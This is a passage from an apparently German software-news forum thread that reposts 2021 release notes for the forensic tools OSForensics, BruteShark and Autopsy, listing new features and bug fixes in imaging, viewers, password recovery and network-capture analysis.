        Fixed an issue when exporting a report using the copy files option, if a source file was read only then multiple error messages could be show during the file copy process.

        Improved speed of export when large amounts of files are being exported as part of the report
    USEDB viewer

        updated to library code for compatibility with newer helper libraries

    Verify Hash

        Fixed a bug where clicking the "upper case output" option after generating a hash would not update the primary hash and instead replace the secondary hash with the upper case primary

    File system support

        Updated library code for reading E01 and L01 files. While there were multiple changes under the hood, the most visiible change should be better support for L01 image files. In particular it fixes a case where a NTFS directory entry in a L01 could point to the wrong file.

[close]

http://www.osforensics.com/
Titel: BruteShark 1.1.4
Beitrag von: SiLæncer am 09 Januar, 2021, 09:00
Whats new:>>

BruteShark can now handle pcapng files (as well as the old pcap file format).
PCAPNG example files where added to the repo at, so you can check it by yourself : https://github.com/odedshimon/BruteShark/tree/master/Pcap_Examples/Pcap_Examples_PCAPNG

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.1.5
Beitrag von: SiLæncer am 23 Januar, 2021, 10:00
Whats new:>>

BruteSharkCli now has two modes: single command and shell mode. The single command mode works by geting all the relevant parameters for the processing and then printing the results to stdout or files. The shell mode allows to perform each step individually.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.1.6
Beitrag von: SiLæncer am 25 Januar, 2021, 20:00
Whats new:>>

Add exporting of extracted files to BruteSharkCli.
Fix a bug while exporting network map to JSON.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1006
Beitrag von: SiLæncer am 28 Januar, 2021, 20:00
Changelog
              
    Auto Triage

        Updated select drives dialog.
        Renamed "Deleted Files" to "List of Deleted Files"
        Renamed "File Listing (Signature)" to "File Listing"
        Added timezone to Process List and File Listing exporting CSV
        Updated to add not only the OS boot drive but also all the other available logical and physical drives to case, and then scan all of them to create file listing
        Deleted file search, updated to scan all drives available and export to CSV files separately
        Added drive selecting options for file listing and deleted files searches

    Case Manager

        Add Device, Added debug output when populating device dropdown
        More robust handling of case device dropdown
        Added more verbose logging during case load

    Forensic Imaging

        Removed unnecessary refreshing of drive dropdown when loading Create Image tab
        Added more verbose logging when opening Forensic Imaging window
        Added debug output when populating device dropdown

[close]

http://www.osforensics.com/
Titel: OSForensics 8.0.1007
Beitrag von: SiLæncer am 17 Februar, 2021, 13:00
Changelog
       
    Auto Triage

        Fixed an issue in the Logical Image configuration window where a non-system drive path was not added properly to the image creation list.

    User activity

        Fixed a crash that could occur when removing the filter after using timeline view to view and select files at a certain time

[close]

http://www.osforensics.com/
Titel: BruteShark 1.2.0
Beitrag von: SiLæncer am 08 März, 2021, 23:30
Whats new:>>

Both versions of BruteShark is now capable of live capturing and analyzing network data directly from a network interface!
This version featuring all required features for operating the live capture option easily and smoothly:

    List all available network interfaces names.
    Enable configure BPF filters.
    Enable using promiscuous mode.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.2.1
Beitrag von: SiLæncer am 11 April, 2021, 21:00
Whats new:>>

Both versions of BruteShark (BruteSharkDesktop & BruteSharkCli) is now capable to extract Voip calls.

    Voip calls can be exported to raw-audio files
    Example PCAP files where added to the repo.

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.2.2
Beitrag von: SiLæncer am 02 Mai, 2021, 10:00
Whats new:>>

    Fix a bug that cause Kerberos hashes over TCP hashes was not extracted due to lack of proper parsing of "Record mark" section parsing (See issue: #90 )
    Implement Kerberos TGS-REP Etype 17 and 18 hashes parsing include Hashcat export.
    Upgrade all projects NuGets.
    Add a link to download BruteSharkCli for windows.

https://github.com/odedshimon/BruteShark
Titel: OSForensics 8.0.1008
Beitrag von: SiLæncer am 07 Juni, 2021, 09:00
Changelog
       
    CloudMail

        Fixed issue with Microsoft Outlook/Hotmail email when Content-Length is not returned in the header, but response body contains text

    ThumbCache Viewer

        Fixed an issue where Thumbnail items were not able to add to the case

    User Activity

        Form Autofill, fixed crash with change to Autofill in Edge Chromium when data value in sqlite db is not encryptet
        Passwords, fixed wireless network passwords recovery issue
        Passwords, fixed Firefox browser password recovery bugs

    Misc

        Fixed Typo in Expiration/Subscription GUI Text

[close]

http://www.osforensics.com/
Titel: Autopsy 4.18.0
Beitrag von: SiLæncer am 01 August, 2021, 09:00
(https://s26.postimg.cc/915w3piwp/screenshot_1239.png)
Autopsy is a graphical interface to The Sleuth Kit and other analysis tools. It was designed to be an extensible platform so that it can be an end-to-end digital forensics solution that incorporates plug-in modules from both open and closed source projects. The application provides users with various analysis features and with the possibility of generating HTML or CSV reports as well.

License: GPL

Changelog

Keyword Search:

    A major upgrade from Solr 4 to Solr 8.6.3. Single user cases continue to use the embedded server.
    Multi-user clusters need to install a new Solr 8 server and can now create a Solr cloud with multiple servers.
    -- NOTE: Cases created with Autopsy 4.18 cannot be opened by previous versions of Autopsy. Autopsy 4.18 can open older cases though.
    -- See http://sleuthkit.org/autopsy/docs/user-docs/4.18.0/upgrade_solr8_page.html for more details.
    Improved text indexing speed by not doing language detection on unknown file formats and unallocated space.

Domain Discovery:

    Added details view to Domain Discovery to show what web-based artifacts are associated with the selected domain.
    Updated the Domain Discovery grouping and sorting by options.
    Added basic domain categorization for webmail-based domains.

Content Viewers:

    Built more specialized viewers for web-based artifacts.

Data Source Summary:

    Added a “Geolocations” tab that shows what cities the data source was near (based on geolocation data).
    Added a “Timeline” tab that shows counts of events from the last 30 days the data source was used.
    Added navigation buttons to jump from the summary view to the main Autopsy UI (for example to go to the map).

Ingest Modules:

    New YARA ingest module to flag files based on regular expression patterns.
    New “Android Analyzer (aLEAPP)” module based on aLEAPP. Previous “Android Analyzer” also still exists.
    Updated “iOS Analyzer (iLEAPP)” module to create more artifacts and work on disk images.
    Hash Database module will calculate SHA-256 hash in addition to MD5.
    Removed Interesting Item rule that flagged existence of Bitlocker (since it ships with Windows).
    Fixed a major bug in the PhotoRec module that could result in an incorrect file layout if the carved file spanned non-contiguous sectors.
    Fixed MBOX detection bug in Email module.

Reporting:

    Attachments from tagged messages are now included in a Portable Case.

Misc:

    Added support for Ext4 inline data and sparse blocks (via TSK fix).
    Updated PostgreSQL JDBC driver to support any recent version of PostgreSQL for multi-user cases and PostgreSQL Central Repository.
    Added personas to the summary viewer in CVT.
    Handling of bad characters in auto ingest manifest files.
    Assorted small bug fixes.

[close]

http://www.sleuthkit.org/autopsy
Titel: Autopsy 4.19.0
Beitrag von: SiLæncer am 02 August, 2021, 19:00
Changelog

Data Source Management:

    To make managing big cases easier, all data sources are now associated with a host that can be specified in the “Add Data Source” wizard.
    Hosts can be grouped by “person”, which is simply a name of the owner.
    The main tree viewer can be configured to group by person and host.

OS Accounts:

    Operating System (OS) accounts and realms are their own data types and no longer generic artifacts.
    OS Accounts are created for Windows accounts found in the registry. Domain-scoped realms are not fully detected yet.
    NTFS files are associated with OS Accounts by SID.
    The Recent Activity module associates artifacts with OS Accounts based on SID or path of database. Other modules still need to be updated.
    OS accounts appear in a dedicated sub-tree of the main tree view and their properties can be viewed in the results view.
    A new content viewer in the lower right area of the main window was built to display OS account data for the item selected in the results view.

Analysis Result and Data Artifacts

    All modules make either Analysis Results or Data Artifacts instead of “Blackboard Artifacts.”
    New “Analysis Result” content viewer shows the results for a given file and its score.
    The tabular results viewer shows an icon for the aggregate score of a file.
    The tree organizes results into "Analysis Results" and "Data Artifacts" instead of simply “Results.”

Discovery UI:

    Domain categorization and account types are displayed in Domain Discovery results.
    The Domain Discovery results view more explicitly shows when a downloaded file no longer exists.
    Check boxes are now used to select search options instead of shift-based multi-select.

Ingest Modules:

    File metadata updates are batched up before being saved to the case database for better performance.
    Parsing of iLEAPP and aLEAPP output was expanded to create communication relationships which can be displayed in the Communications UI.
    EML email parsing handles EML messages that are attachments (and have their own attachments).
    Domain categorization within Recent Activity can be customized by user-defined rules that can be imported and exported.
    Account IDs and Installed Applications are added to the Central Repository.
    Keyword search can be configured to only do OCR and skip non-OCR files.

Miscellaneous:

    A “Reset Windows” feature was created to help redock windows.
    A case-insensitive wordlist of all words in the keyword search index can be exported as a text document.
    Information from the Data Source Summary panels can be exported as an Excel spreadsheet.
    More artifacts are added to the timeline and artifacts with multiple time-based attributes are mapped to multiple timeline events.
    Added option to only perform optical character recognition on certain file types.
    Heap dumps can be saved to a custom location.
    More detailed error messages about encrypted disks when they are added.
    Added file size filter to Ingest Filters.

Performance:

    Keyword search does not make an explicit commit for each report if ingest is running.
    Language ID is performed on a small subset of a file instead of the entire file.
    Recent Activity is more efficient because of TSK changes to file searching (using extension).
    Embedded file extractor module has been made faster by doing file typing in memory and adding extracted files in batches.
    Moved Content Viewers setNode() and isSupported()/isPreferred() code to background threads.
    Moved Data Source Summary Panel population code to background threads.
    Moved Node/Tree queries to background threads.

Bug Fixes:

    Fixed embedded file extractor file name escaping bug.
    Detect VHD files by signature and not extension.
    Fixed iLEAPP path error.
    Content viewers UIs are more consistent.
    Assorted bug fixes are included.

Auto Ingest:

    The Auto Ingest Dashboard is resizable.
    Get thread dumps from AID
    Added beta pause feature that pauses auto ingest for a set amount of time at a scheduled date and time.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.0.1000
Beitrag von: SiLæncer am 05 August, 2021, 09:00
Changelog
       
    Map Viewer:

    Added Map Viewer module which enables users to view GPS locations marked on a world map.
    Added a new pre-set search option, “Photos with GPS Locations” to automatically find all photos with embedded GPS locations (via EXIF data) and then graphically locate where these photographs were taken on a map. On mouse over of the location on the map thumbnail images and image meta are displayed.
    Ability to import and map GPS coordinates from CSV, GPX and KML files and IP addresses, and search for GPS location by name (ie. Geocoding
    Added map email viewer integration, to draw arrows between the source and destination of an Email, plus any intermediate transit nodes referenced in Email header.

    Auto Triage:

    Removed some unnecessary warning messages (You are attempting a non-live…) displayed when running Auto Triage
    Updated the Passwords to select "Live acquisition" for scan when running Auto Triage.

    Boot VM:

    Updated to now allow booting for MacOS (10.13 and above)
    Now includes support for VMWare Workstation Player 16

    Clipboard Viewer and Signatures Module:

    Restructured UI for consistency and simplicity in OSForensics user experience

    Create / Search Index:

    Restructured UI for simplified user experience. This included convert to 'Sort' link, convert to 'Index' link, move 'Use Word List File' to button dropdown, and consolidated regex filter to search bar.
    Improved indexing of XML files to index not only data content, but also attribute values in tags. Combined with expanding the max word length to 40 characters, this now allow indexing of GUIDs values in XML files. This allows finding GUIDs in peer-2-peer file sharing files (e.g. Profiles.xml file from Shareaza)
    Added sub tabs under ‘Browse Index’. These include Words, Files and Protected lists.
    Added "Save to disk" checked items menu option
    Reporting of “protected” (or encrypted) files that were encountered and not indexed. Provides a quick way to identify all commonly encrypted document types.
    Fixed bug with "Search Index", when matching exact phrases only found in meta description
    Fixed crash bug for when page is near end of index
    Fixed bug with extra text appearing after highlighting when exact phrase matched in meta description
    Fixed timeline filter and other UI issues
    Fixed cleanup of previous state when closing case
    Fixed bug with email indexing causing corrupt index when long header or attachments are used as description in index
    Fixed crash bug when corrupt index is encountered during a search and cleanup occurs, and subsequent searches did not reload the index
    Added handling for partial index unloaded/reloading due to unexpected error cases (low memory, corrupt index, etc.)

    Disk Preparation:

    Fixed a bug stopping Disk 0 from being formatted

    Decrypt File:

    Password Benchmark (i.e. num password per second) is now calculated per thread. Previously only the first benchmark collected was used as the benchmark value for all clients.

    Deleted File Recovery:

    Restructured UI for consistency and simplicity (convert to 'Sort' link, convert to 'Preset' link, reduce clutter at the bottom)
    Added ability to right click on an extension in the scan status tab to view the set of files.
    Added the Face and Nudity Scan feature to the sorting option
    FileCarver Config GUI changed the +/- icons to normal expand/collapse icons. Removed the Linux EXT2 option, FileCarver will try to determine the file system and enable it if necessary.
    Fixed display bug where scrolling to the right and then back, where the listview checkbox/extension column would be unreadable. Added note to expand the extension groups to view the header/footer/etc details for each extension family.
    Fixed a crash that could occur when no files where found

    Device Manager:

    Added support for per-volume encryption, as used in newer versions of Apple’s APFS file system.

    Email Viewer

    Added right-click option to lookup IP addresses in e-mail headers and then mark on Map Viewer.
    Added "Overview" button to view email address statistics in email viewer. Can now get a quick count of Emails To / From each Email address.
    OSForensics will attempt to convert X.400/X.500 e-mail addresses by parsing the MIME headers if available
    Added support for indexing EMLX files from Apple Mail
    Fix overflow with long To/Cc/Bcc strings in mbox and dbx files. Fix missing single address summary icon. Add Top 10 contacts filter to sankey graph. Combine sankey graph and summary table when added to case

    Event Log Viewer:

    Added OSF generated event information as a summary string in quotation marks when viewing items in the event log viewer (for eg “Disconnected USB device "TOSHIBA External USB 3.0 " , Serial Number: XXX").

    File Name Search:

    Optimizations for improved scan speed and performance, especially when using the direct access mode (also called forensics mode).
    Reorganized UI for consistency and simplicity (convert to 'Sort' link, convert to 'Preset' link, move configuration text to tooltip for 'Config' link)
    Dynamically populate map view as files with GPS locations are found, and display image thumbnail (and file metadata) on mouseover of location while in map view
    Fix stack overflow crash due to large local string variables
    Changed search preset name ‘Windows Shortcut Files’ to ‘LNK Files’
    Updated the P2P pre-sets to include UseNet related keywords

    Hash Sets and Create Hash:

    Grouped the two modules into one main hashing module (File Hashing) with two tabs (Hash Sets & Create Hash).
    Added SHA3 (256, 512) as hash options

    Internal Viewer:

    Re-implemented thumbnails using global thumbnail cache for better performance. Increased number of thumbnails in lower bar to fill window width and added support for video thumbnails.
    Jump to file when double clicking thumbnail
    Add extracting of embedded thumbnails in image file within the 'Analyze' dialog. This can help with checking for image manipulation.
    When a file is fragmented on disk, viewer can display list of file fragments + right-click option to jump to fragment
    Improved drawing performance and navigation buttons.
    Hex view, add 'Export strings...' link to string extractor
    Initial support for viewing PDF files using native API in Win10. This allows faster more accurate PDF rendering in viewer.
    Display Office Documents (docx, xlsx, pptx, etc) and OpenDocument (odt, odp, odx) files as HTML.
    When analyzing images, add right-click menu options to embedded thumbnails to 'View with internal viewer...' and 'Add to Case'

    Mismatch Search:

    Restructured UI for consistency and simplicity.
    Fix bug with 0 byte files not being excluded from results

    Password Recovery:

    Restructured UI for consistency and simplicity.
    Distributed password cracking with support for Multiple GPUs (Pro Only). Supports up to 1000 total clients when using distributed cracking
    Fixed an issue with Firefox password recovery, a crash that could occur when parsing Firefox V31 and earlier versions passwords

    Program Artifacts:

    Restructured UI for consistency and simplicity.

    Raw Disk Viewer:

    Restructured UI for consistency and simplicity (move buttons to 'Actions' link, convert to 'Config' link, add search bar)

    System Information:

    Re-organized UI for simplicity and consistency (consolidate "Live acquisition" into combo box, convert into "command list" link).

    Thumbnail Viewer:

    Fixed drawing of images with alpha channel.

    Tag/Untag:

    Changed behaviour of Tagging Files. Keyboard Shortcut (Ctrl+T) applies to selected (not checked) files. The Checked Items Submenu will have options to Tag/Untag checked files by submenu selection only. This has been implemented in FileSystem Browser and Find Name Search.
    Ability to open some tagged items in the case manager, e.g. cookie tagged item. ‘Open internal viewer’ will open the SQLite database where cookie was stored.
    Items tagged in the User Activity modules will indicate they were added in this module in the Case Manager

    User Activity:

    Restructured UI for simplicity and consistency.
    Moved 'Remove filter' link to 'Activity Filters' drop down
    Added Anti-Forensics Artifacts to scan the traces of Anti-Forensics programs
    Search Terms, cut down on duplicate entries by using DISTINCT in SQL query
    Events, filtered out 4624 event when logon type is 5 (too many system generated events swamping others)
    Added Cryptocurrency Wallet Apps to scan artifacts of wallet applications installed on the system
    Fixed activity-specific right click menu options and enter/double click options
    Added support for parsing UseNet NZB files to display filename, file size, poster and time
    Added Newshosting UseNet client P2P artifacts
    Changed the tree-view “Most Recently Used” item to be collapsed by default
    Fixed crash with change to Autofill in Edge Chromium when data value in Sqlite DB is not encrypted.
    Added a 3 second display of message "User Activity Scan Finished - No items found" when no items are found
    Added more checks for cancelled scan when processing ESEDB databases so cancel will complete faster
    Added support to parse the BitTorrent .torrent file format to display its contents info like the filename, file size, and time
    Added scanning for WiFi passwords stored on the Windows system and display under the WLAN category
    Fixed an issue with Firefox password recovery, a crash that could occur when parsing Firefox V31 and earlier versions passwords
    Added support to collect details about recently viewed PDF files in Acrobat Reader and their file size and page numbers.
    Added an option in the config window to allow full scan of the selected drives, which will search Torrent and NZB files across the drives and parse them
    Added support to collect the VLC Media Player last opened filepath by parsing it's .ini file

    Start Menu:

    Added search bar to the start page to quickly find OSF features

    Workflow:

    Set Mount Drive Image button to be hidden by default in the Workflow menu. This was done as the Add Device function is preferable in nearly all cases

    Python API:

    Add methods for adding/removing device from case (including BitLocker and Volume Shadow devices)

    Remote Server:

    Fix bug in creating destination folders when source path is a network folder

    Security:

    Update EXIFTool to 12.25 due to ACE security vulnerability

[close]

http://www.osforensics.com/
Titel: Autopsy 4.19.1
Beitrag von: SiLæncer am 10 August, 2021, 11:00
Whats new:>>

    Bug Fixes:

    Fixed connection leak associated with creating OS Accounts
    Decreased priority of OS Account Content Viewer
    Misc bound check fixes in TSK

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.0.1001
Beitrag von: SiLæncer am 17 August, 2021, 19:00
Changelog
       
    Auto Triage:

    Fixed bug with loading user-specified logical image file type settings from config file

    Case Manager:

    New right click option in the case list to open the containing folder (in Windows Explorer).

    Clipboard Viewer:

    Changed linking of WinRT libraries shcore library or Win7 compatibility

    Disk Image:

    Cleaned up the word wrapping on message box warning

    Email Viewer:

    Increased size of 'To' and 'Cc' fields. Enabled word wrapping.

    Filesystem Support:

    Fixed bug in FAT entry offset calculation due to using float type. This caused incorrect offset calculation on exFAT file systems

    File Name Search:

    Added status window for adding files/folders to logical image to improve responsiveness when adding a large number of items

    Internal Viewer:

    When viewing PDF files earlier than Win8, use text conversion instead of native PDF viewer
    Changed linking of WinRT shcore library for Win7 compatibility
    Changed linking of WinRT Windows.Data.Pdf.dll library for Win7 compatibility

    Logical Image:

    Fixed performance issues when adding/removing sources when there are large number of existing items

    Password Recovery:

    Changed linking of OpenCL.dll to delay for Win7/8 compatibility

    Python API:

    Updated youtube-dl to newest version
    Added new Python script template for recursing directories in a file system, ignoring specified extensions and subdirectories

    Start Window:

    Search bar now searches as text is entered.
    Changed search to ignore word order, allow results for (n-1) search terms if no results, return help file if no results.
    Prevent certain search inputs that could cause unintended behaviour.

    WebBrowser:

    Updated web browser module to use webview2. On systems that support it (i.e. have chromium edge installed), the webview2 browser will be used, for systems without, will use the old browser control.
    Change linking of GetDpiForWindow for Win7 compatibility
    GUI Navigation/Icons should be less blurry
    Removed Save Page/Add to Case button/option (it is not implemented/supported by Webview2)
    Fixed issue with resizing browser window below minimum size and buttons moving out of place.
    Export Page, fixed possible bug when downloading a file/video fails causing OSForensics to crash.
    Changed default capture area (camera button) to Whole Page.
    GUI Added visible note to users notifying them that right click options (Save As and possibly Print) on webpages are not working due to webview2 running in elevated permissions as required by OSF.

[close]

http://www.osforensics.com/
Titel: BruteShark 1.2.3
Beitrag von: SiLæncer am 01 September, 2021, 22:00
(https://i.postimg.cc/SKYnyNkt/screenshot-2749.png)
BruteShark is a Network Forensic Analysis Tool (NFAT) that performs deep processing and inspection of network traffic (mainly PCAP files). It includes: password extracting, building a network map, reconstruct TCP sessions, extract hashes of encrypted passwords and even convert them to a Hashcat format in order to perform an offline Brute Force attack.

License: GPLv3

Whats new:>>

    Add "Clear Results" button (following #95).
    Bug fix - although a certain network interface was selected at the user interface, another network card was selected behind the scenes (following to #99, #100).
    Upgrade to SharpPcap 6.0.0 (better performance among other improvements).

https://github.com/odedshimon/BruteShark
Titel: OSForensics 9.0.1002
Beitrag von: SiLæncer am 08 September, 2021, 11:00
Changelog
       
Auto Triage

Support for saving compressed Case files (experimental)
Support for uploading Case files to FTP server (experimental)
Fixed UI mouseover issues

Case Manager

Support for importing compressed Case files (experimental)
Fixed a error that occurred when trying to create a case in a network path

Create / Search Index

Fix crash bug when indexing corrupted OLE files (OLE is used in old style XLS, DOC, PPT files)
Added export of "lastfailedindexcfg.zcfg" for debugging purposes when indexing fails
Fixed potential crash bug with buffer issues in indexer

Memory Viewer

When running from network drive, DirectIo driver copied to temporary directory before loading. This is required becuase device drivers aren't be loaded by Windows from network drives.
When saving memory dump to network location, saves to temporary location before moving to network path

Start Window Search

Fixed home/end keys in text input
Added more search results

User Activity

Fixed potential memory buffer overflow crash in function on Win XP
Fixed a crash that could occur when collecting SRUM artifacts on Windows 11

Misc

Fixed crash when running from network drive
Update OpenSSL library in use to 1.1.1L. Previous version in use was v1.0.2L. This fixes a couple of potential security issues in OpenSSL.
Updated help documentation for internal viewer, E-mail viewer, map viewer, file name search map view, updated screenshots

[close]

http://www.osforensics.com/
Titel: BruteShark 1.2.4
Beitrag von: SiLæncer am 15 September, 2021, 22:00
Changelog

This version contains an implantation of new network model.
That data structure role is to store the current network state including all the extracted items.
Apart from the fact that this refactor improves the readability and structure of the code, thanks to this data structure different display components can share information while maintaining unconsciousness from each other (e.g the Network Map user control can now access DNS records if there are any).

Main Features:

    Network Map user control now have a control describes the node details: open ports, DNS records, sessions count.
    The exported files including a new file named "BruteShark Network Nodes Data.json" that holds all the nodes details (following issue #77).
    Better performance.

[close]

https://github.com/odedshimon/BruteShark
Titel: BruteShark 1.2.5
Beitrag von: SiLæncer am 01 Oktober, 2021, 10:00
Changelog

    This version contains few improvements and features:

    First, the network map had upgraded by adding additional fields that enables to get insights about domain users and the amount of data transferred from each point in the network:
    Sent data - The amount of data (bytes) sent by the host.
    Received data - The amount of data received (bytes) by the host.
    Domains - the domains that the host is a member of.
    Domain users - domain users that logged into the host.
    This fields will also appear at the "BruteShark Network Nodes Data.json" file that holds all the nodes details.

    Secondly, the BruteSharkDesktop installer file was upgraded:

    Allow to upgrade existing version of BruteSharkDesktop without the need to manually remove the old version.
    Set the license also at the installer prompt.

[close]

https://github.com/odedshimon/BruteShark
Titel: OSForensics 9.1 Beta 3
Beitrag von: SiLæncer am 08 November, 2021, 11:00
Changelog
       
Create / Search Index

    - Added "Save to disk" checked items menu option
    - Added "Uncheck all" menu option
    - Updated text for "Save to disk" option

Email Overview

    Fix overflow with long To/Cc/Bcc strings in mbox and dbx files. Fix missing single address summary icon. Add Top 10 contacts filter to sankey graph. Combine sankey graph and summary table when added to case.

File Name Search

    Updated the P2P presets to include UseNet related keywords

Logical Image

    Fixed a bug in creating destination folders when source path is a network folder (eg. \\holly\temp)

User Activity:

    Added an option in the config to allow full scan of the selected drives, which will search Torrent and NZB files across the drives and parse them


Changes for Beta 2:

OS Support

    Adding Windows 11 support.
    (at this point there is one open issue with parsing the am-cache data in Win11. All other modules should work in Win11)


Email Viewer

    Added single email summary and sankey graph
    Fixed buffer overflow when there are too many destination e-mail addresses

Email Overview

    Added email summary to case manager

User Activity

    Added feature to scan the Anti-Forensics artifacts from AppCompatFlags records.
    Added Desktop and Documents locations for P2P artifacts scan
    Added sub-category under P2P
    Updated P2P columns
    Restored 'User Activity - Summary' dialog box to tree right-click menu (to hide items in the tree view that have zero results)

ESEDB Viewer

    Fixed an issue where tree-view items are not loaded in the ESEDB Viewer if User Activity has not been initialized before
    Fixed an issue loading ESE Database files of Windows 11 Pro Version 21H2

File Name Search

    Fixed map view popup with incorrect width due to unitialized variable
    Change alpha of map view popup thumbnail from 50% -> 100%

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1000
Beitrag von: SiLæncer am 11 November, 2021, 11:00
Changelog
       
    * NEW JSON Viewer *
        Supports syntax highlighting for JSON documents
        Treeview shows the hierarchical dependencies between JSON nodes
        Supports JSON formatting and indenting
        Supports compressing (minifying) JSON documents
        Supports encoding: UTF8, ASCII, UTF16 BE/LE
    * NEW Remote Acquisition *
        Preliminary implementation of remote acquisition module
        Added encryption to configuration file. Prompt user for password when loading/saving config file
        Automatically import case when remote acquisition complete
        Support for domain user accounts
        Support for compressed Case File
    Auto Triage
        Fixed bug in FTP case file upload
        Added error messages when uploading of case file failed
        Save FTP config to OSF config file on close
        Fixed minor UI bug when hovering over triage tasks
        Refactor to support running without GUI (ie. command line option)
        Added command line options to run Auto Triage in standalone mode
    Case Management
        Added Case Size column to the list of selectable cases. Size is calculated in background thread
        Added option to "Export to file" in "Export Case" button dropdown menu
    Create / Search Index
        Fixed crash bug when searching in index containing long file paths in the protected files list
    Deleted Files
        Fixed multiple device scanning
    Email Viewer
        Tiff Export, Moved tiff export menu item, changed emails md5 to sha1 and added attachments sha1, added tiff export progress to title bar
        Updated tiff export folder structure
        Updated load file format, added text extraction (using code from Zoom)
        Renamed concordance export option, removed debugging print
        Added right click option to export emails to concordance load file
    Forensic Imaging
        Improved image creation speed significantly
        Changed buffers sizes used to be 16MB by default and 256MB if there is greater than 6GB free system RAM and changed file access method which results in much better performance on very fast drives
        Changed zlib library in use for 64bit build to the cloudflare fork for increased speed when compressing E01 images
        Changed AFF4 compression from using ZLIB to LZ4 which results in increased speed when creating the image
        Fixed a bug where selecting "None" for the hashing function was still creating an MD5 hash while creating the image resulting in a slower speed than expected
        Added CRC32-C to the available hashing options, an SSE4 enhanced version of CRC that is much faster
        Added hash outputs to create image tab
    Install to USB
        Added option to set the workflow to a minimal set of modules for portable OSF installations
        Allow installation of OSF portable to network folder
        Added option to include python packages
    Image Viewer
        Fixed possible bug where the thumbnails may not be display/extracted the second time the image is analyzed
    Password Recovery
        Fixed crash due to using freed OpenSSL structure
    Start Page
        Re-assigned Modules to different groups
        File System Browser moved to File Searching & Indexing
        Web Browser and Analyze Memory with Volatility moved to House Keeping
        Program Artifacts moved to System Artifacts & Passwords
        Change to "Install to USB" to 'Install to USB or Network'
        Modules hidden in both the workflow menu and start page (via customize workflow) will have grey text and have the word [Hidden] appended when appearing in the Module Feature Search. Note: This does not prevent user from accessing these modules
    SQLite Browser
        Fixed bug where it opened the add to case dialog using the main window's handle instead of SQLite Browser's
        Fixed bug where it opened the file select dialog using the main window's handle instead of SQLite Browser's when selecting 'Load DB'
    User Activity
        Added Browser Custom Dictionary entries for Opera and Firefox.
        Added new Browser Custom Dictionary entries activity type. (Chrome, Chromium Edge, Opera, Firefox)
    Web Browser
        Capture Screenshot Region will capture upon left mouse up (previously required user to hit 'Enter' key)
    Web Capture
        Internal changes to better support timing out when a page fails to load, adding delays after page has completed loading before taking capture, setting the page scale
    Misc
        Updated Crypto++ library to 8.6.0

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1001
Beitrag von: SiLæncer am 12 November, 2021, 19:00
Whats new:>>

Remote Acquisition

Fixed error when network path contains spaces
Use XML config file to pass triage options rather than command line options
Fixed reporting of triage status for pre triage tasks (memory dump) and post triage tasks (HTML report, FTP upload)

Auto Triage

Refactored handling of logical image configuration

http://www.osforensics.com/
Titel: Autopsy 4.19.2
Beitrag von: SiLæncer am 12 November, 2021, 22:00
Changelog

GUI Updates:

Special handling of Interesting Files and Interesting Results analysis results was removed from the tree and they are now shown as individual nodes.
Updated display of analysis results in the tabular results viewer.
Improved algorithm for populating the S(core) column in the tabular results view.
Updated the right-click menu options for data artifacts and analysis results.
The O(ther Cases) column in the tabular results view and the Other Occurrences content viewer now count cases in the same way.

Misc:

Installed applications are now added to the central repository.
The Central Repository ingest module no longer uses the generic Interesting Item analysis result and instead creates more specific Previously Seen, Previously Unseen, and Previously Notable analysis results.
Automatic destinations (jump lists) parsing added to the Recent Activity module.
French translation of user documentation contributed by github user @Seb2lyon .

Bug Fixes:

Analysis Results and Annotation content viewers now work when parent is a data artifact.
Fixed bug that prevented media attachments from being displayed in the Communications Viewer.
Fixed RegRipper bug to support parsing of ShellBags with non-Latin characters.
Assorted GUI responsiveness fixes.
Fixed NTFS handling of compressed files that were not fully initialized (via TSK).
Other assorted bug fixes.

[close]

http://www.sleuthkit.org/autopsy
Titel: OSForensics 9.1.1002
Beitrag von: SiLæncer am 19 November, 2021, 11:00
Changelog

Auto Triage:

Fixed stack overflow when attempting to calculate folder size for logical image
Updated info text for Logical Image Config Dialog Box
When loading previous config, re-prompt for FTP server password if non-anonymous upload is enabled

Android Logical Image:

Fixed bug where after imaging, OSForensics would fail to attach log to case "path not found"

Remote Acquisition:

When loading config file, re-prompt for FTP server password if non-anonymous upload is enabled
Added support for non-anonymous FTP upload without passing plain text password
Added check if portable install version matches current version
Fixed triage status file not being written when saving as compressed Case file format

Misc:

Fixed detection of OSForensics Portable for current running instance

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1003
Beitrag von: SiLæncer am 02 Dezember, 2021, 10:00
Changelog

    Case Management

        Fixed "Verify" option on case items not working correctly
        Fixed "Verify" option on case items without hash values not displaying an error message

    Deleted File Recovery

        Fixed bug, OSForensics will now proceed with File Carving (if enabled) even if the image file contains mixed file system partition types

    JSON Viewer

        Added right-click menu to view HTML format conversations using internal/system web browsers, also double-click to open browser
        Added TXT and CSV exporting options
        Added support to parse Google Hangouts archive JSON format file downloaded from Google Takeout. It provides a summary view of the Hangouts conversation history and allows export of the selected Hangouts conversations to HTML with nicely formatted chatting app-like style so users can easily read through the messages.
        Added right-click menu to export HTML files to case
        Removed Compress JSON button as it may cause crash on large files

    Remote Acquisition

        Fixed logical image creation on remote machine
        Delete temporary config file passed to remote machine when acquisition finished

    Start Window

        Fixed constant CPU usage due to redrawing

    Verify/Create Hash

        Fixed hash function not starting if "none" was selected for the secondary hash

[close]

http://www.osforensics.com/
Titel: OSForensics 9.1.1004
Beitrag von: SiLæncer am 09 Dezember, 2021, 19:30
Changelog

    Case Management:

    Enhanced USB Write Block block more kinds of removable storage devices

    Disk Image and Filesystem Support:

    APFS, added additional file system caching for better performance. Result was up to 30X performance improvement for file searching.
    Support for APFS Sealed Volumes
    APFS, handle compression algorithm 5

    File Viewer:

    Fixed hang when a file system read error occurs when attempting to generate thumbnails

    JSON Viewer:

    Added new feature to parse Google Location History JSON format archive file exported via Google Takeout service, shows a summary of the locations list.
    Selected locations can be exported in KML/GPX/CSV formats for use in applications like Google Earth, Google Maps My Maps and OSForensics Map Viewer.
    Updated right-click menu to view locations on internal Map Viewer.

    Web Capture:

